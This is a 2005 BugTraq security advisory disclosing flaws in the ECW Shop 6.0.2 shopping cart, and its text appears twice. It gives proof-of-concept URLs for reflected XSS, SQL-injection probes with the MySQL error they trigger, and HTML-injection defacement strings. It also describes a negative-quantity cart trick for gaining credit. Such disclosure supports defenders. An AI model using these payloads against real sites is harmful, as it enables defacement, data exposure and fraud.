BugTraq
Back to list
|
Post reply
[NOBYTES.COM: #9] ECW Shop 6.0.2 - Multiple Vulnerabilities
Aug 15 2005 10:29PM
John Cobb (johnc nobytes com)
Hello All,
I have discovered a number of remote vulnerabilities in: ECW Shop 6.0.2
Authors Site: http://www.soft4e.com/
ECW Shop is described by its authors as:
ECW-Shop - simple for use featured shopping cart with ability to use Excel
or Access format for database.
+-[Examples:]--------------------------------------------------+
[1]------------------------------------------------------------+
XSS: (This same problem was reported on version 5.5 by David S. Ferreira -
http://www.securityfocus.com/bid/9244)
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe3
69c3
6d90d8e9&key=1&comp=1&min=1&max=><script>var%20xss=31337;alert(xss);</sc
ript
>
[2]------------------------------------------------------------+
Information Disclosure & Possible SQL Injection:
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe3
69c3
6d90d8e9&key=1&comp=1&min='&max=1
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe3
69c3
6d90d8e9&key=1&comp=1&min=1&max='
Error:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /var/www/html/search.php on line 109
[3]------------------------------------------------------------+
HTML Injection:
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe3
69c3
6d90d8e9&key=1&comp=1&min=1&max=><H1>DEFACED!</H1>
http://www.victim.com/index.php?id=754ce025144839c2abe369c36d90d8e9&c=sr
ch&i
d=754ce025144839c2abe369c36d90d8e9&key=&ctg=<H1>DEFACED!</H1>&comp=&min=
1&ma
x=1
[4]------------------------------------------------------------+
Cart/Order Manipulation:
You can add negative quanity value items to your cart to gain credit.
Example:
Add '-1' of an item with a value of £4.99 Add '1' of an item with a value of
£6.99
Cart Total: £2.00
+-[Notes:]-----------------------------------------------------+
Vulnerabilities found on: 06/08/2005
Author(s) Informed on: 06/08/2005
Author(s) Response: NONE
Author(s) Fix: NONE
JohnC (at) NoBytes (dot) com [email concealed]
http://www.NoBytes.com
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
I have discovered a number of remote vulnerabilities in: ECW Shop 6.0.2
Authors Site: http://www.soft4e.com/
ECW Shop is described by its authors as:
ECW-Shop - simple for use featured shopping cart with ability to use Excel
or Access format for database.
+-[Examples:]--------------------------------------------------+
[1]------------------------------------------------------------+
XSS: (This same problem was reported on version 5.5 by David S. Ferreira -
http://www.securityfocus.com/bid/9244)
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe3
69c3
6d90d8e9&key=1&comp=1&min=1&max=><script>var%20xss=31337;alert(xss);</sc
ript
>
[2]------------------------------------------------------------+
Information Disclosure & Possible SQL Injection:
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe3
69c3
6d90d8e9&key=1&comp=1&min='&max=1
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe3
69c3
6d90d8e9&key=1&comp=1&min=1&max='
Error:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /var/www/html/search.php on line 109
[3]------------------------------------------------------------+
HTML Injection:
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe3
69c3
6d90d8e9&key=1&comp=1&min=1&max=><H1>DEFACED!</H1>
http://www.victim.com/index.php?id=754ce025144839c2abe369c36d90d8e9&c=sr
ch&i
d=754ce025144839c2abe369c36d90d8e9&key=&ctg=<H1>DEFACED!</H1>&comp=&min=
1&ma
x=1
[4]------------------------------------------------------------+
Cart/Order Manipulation:
You can add negative quanity value items to your cart to gain credit.
Example:
Add '-1' of an item with a value of £4.99 Add '1' of an item with a value of
£6.99
Cart Total: £2.00
+-[Notes:]-----------------------------------------------------+
Vulnerabilities found on: 06/08/2005
Author(s) Informed on: 06/08/2005
Author(s) Response: NONE
Author(s) Fix: NONE
JohnC (at) NoBytes (dot) com [email concealed]
http://www.NoBytes.com
[ reply ]